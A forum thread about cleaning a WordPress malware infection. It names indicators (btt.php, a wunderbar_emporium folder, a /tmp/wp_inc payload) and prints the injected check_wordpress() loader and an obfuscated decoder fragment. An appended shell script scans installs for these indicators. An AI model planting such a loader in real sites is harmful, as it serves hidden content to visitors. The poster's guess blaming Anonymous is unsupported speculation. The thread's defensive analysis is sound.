Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)
  • @keesiemeijer you rock! btt.php is the key!

    Logged on to my server and looked for the file; I only found that file on infected WordPress installations. btt.php looks to be related to the Technorati import module and it was used to put some files on the server in /wp-admin/import.

    While looking for the file I noticed something strange in one of my installs in wp-admin/import/wunderbar_emporium!!! Inside this folder there are some files that were not supposed to be there. They were most likely put there by the hacker!

    This is mind-blowing stuff! I will investigate this further and post the results!

    wunderbar_emporium is the name of the Linux exploit responsible for all this hassle! Contact your host providers (I run my own server) and notify them about this (check to see if the files are there first).

    *edit – this exploit however does not work, since WordPress uses 2 index.php files … the one the WordPress install has (root) and the theme's (wp-content/themes) index.php; and the code declares function _765258526($i){$a=Array();return base64_decode($a[$i]);} twice, since it's inserted in both files, causing it to malfunction.

    So far I have decoded `$GLOBALS['_2143977049_']=Array();
    function _765258526($i){$a=Array();return base64_decode($a[$i]);}
    $GLOBALS['_226432454_']=Array();` There is another part I cannot decode yet.

    Decoding the whole thing would help us find out what the malware script was doing and put a stop to these kinds of recent hacks.

    This attack is related to the MW:JS:DEPACK one.
    Your Linux server is infected; I would recommend changing all the passwords you can (SQL, root, FTP).

    I had the MW:JS:DEPACK on November 5th and wrote an article about it here: How to Remove MW:JS:DEPACK.

    On 14 Nov my server (all index.php files) was infected by this malware.
    I've written a tutorial here: How to remove Cannot redeclare _765258526; however, I realize now that the issue is with the server and not the WordPress install.

    To avoid removing all the code by hand, just replace (overwrite) the WordPress install files, then manually clean the theme's index.php.

    CHMOD'ing the theme's index.php to 444 helps; otherwise the code will be inserted again.

    I'm starting to think that these are Anonymous's (the hacker group) DDoSes at work (they are using our sites' visitors), since both exploits (MW:JS:DEPACK and redeclare _765258526) open an invisible iframe on our site, an iframe that loads a certain page at a certain moment (with JS:DEPACK it was Facebook).

    @jeanettem
    Either manually update it or just remember to switch it back to 644 (owner has permission to write) before updating the WordPress install.

    About the 500 server error, I would recommend backing up your site (SQL database and files) immediately, since the issues might be related.

    I have a horror story for you: a while back (3 weeks) a similar malware code affected one of my WordPress sites created for a client and hosted on JustHost, and when this issue arose, JustHost deleted the SQL database. No warnings, no nothing … and yes, I did not have a backup.

    I'm not saying that this is the case with your site, but better safe than sorry.

    ALSO, to whom it might concern, the error
    Parse error: syntax error, unexpected '<' in /path/www/genericsite.tld/wp-settings.php on line 131 is also caused by this malware; it affects old WordPress installs where the insertion of

    // the loader the malware injects: it reads /tmp/wp_inc and prints it into the page head
    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . '/wp_inc')){
    readfile($t_d . '/wp_inc');
    }
    }
    add_action('wp_head', 'check_wordpress');
    do_action( 'init' );

    broke the file.

    @jeanettem, sorry for being unclear.

    I run my own server, so I have full rights on it and can access it as root, and in my case the /tmp folder of the machine (Linux server) was infected!

    – This is not the case when you use shared hosting provided to you by a 3rd party.

    When you use a host's server, a /tmp folder is created just for you and, in theory (only), in that /tmp folder (look for it in your root, not in /www/…) you should find a wp_inc file. Replace that wp_inc file with a blank one and set it to read-only (chmod 444) so this does not happen again.

    This however only fixes this particular issue. You probably still can have other files infected, so my best bet would be to also chmod 444 (read-only) the wp-settings.php file in your WordPress install, to prevent it from being infected again. But REMEMBER you did this, since when you upgrade your WordPress this file will not get overwritten (updated) and all hell can break loose.

    Happened to me too, server-wide (about 30 WordPress installs were affected).
    Managed to fix everything in about 10 minutes and wrote an article about how to fix the issue on my blog: How to Remove MW:JS:DEPACK

    To answer kastnercrative's question: your server is infected, mate (the wp_inc file can be found in the /tmp folder); either remove the lines in wp-settings.php or the code in the wp_inc file.
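A defender-side check for the indicators named across these replies (btt.php, the wunderbar_emporium directory, the injected check_wordpress() loader, the _765258526 decoder in root and theme index.php files, and the wp_inc payload), written as an added example and not the poster's own code. It assumes the WordPress root and the temp directory are passed as arguments; the neutralising step is the one the poster describes (blank wp_inc, chmod 444).

```shell
# Added example, not the poster's code: scan one WordPress install for the
# indicators named in the replies above. $1 = WordPress root, $2 = temp dir
# the loader reads from (defaults to /tmp). Exits non-zero on any hit.
scan_wp_install() {
  wp_root="$1"
  tmp_dir="${2:-/tmp}"
  hits=0

  # btt.php: the poster only found it on infected installs.
  if find "$wp_root" -type f -name 'btt.php' | grep -q .; then
    echo "HIT: btt.php present under $wp_root"
    hits=$((hits + 1))
  fi

  # Dropped exploit directory under wp-admin/import.
  if [ -d "$wp_root/wp-admin/import/wunderbar_emporium" ]; then
    echo "HIT: wp-admin/import/wunderbar_emporium exists"
    hits=$((hits + 1))
  fi

  # The check_wordpress() loader injected into wp-settings.php.
  if [ -f "$wp_root/wp-settings.php" ] &&
     grep -q 'function check_wordpress' "$wp_root/wp-settings.php"; then
    echo "HIT: check_wordpress() loader in wp-settings.php"
    hits=$((hits + 1))
  fi

  # The obfuscated decoder inserted into root and theme index.php files.
  n=$(find "$wp_root" -type f -name 'index.php' \
        -exec grep -l '_765258526' {} + 2>/dev/null | wc -l | tr -d ' ')
  if [ "$n" -gt 0 ]; then
    echo "HIT: _765258526 decoder in $n index.php file(s)"
    hits=$((hits + 1))
  fi

  # The payload the loader reads from the temp dir; blank means neutralised.
  if [ -s "$tmp_dir/wp_inc" ]; then
    echo "HIT: non-empty wp_inc payload in $tmp_dir"
    hits=$((hits + 1))
  fi

  echo "$hits indicator(s) found"
  [ "$hits" -eq 0 ]
}

# The poster's fix for the payload: empty wp_inc and make it read-only.
neutralise_wp_inc() {
  : > "${1:-/tmp}/wp_inc" && chmod 444 "${1:-/tmp}/wp_inc"
}
```

Run it as `scan_wp_install /var/www/site /tmp` per install; the theme index.php and wp-settings.php hits still need the manual cleanup the replies describe.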
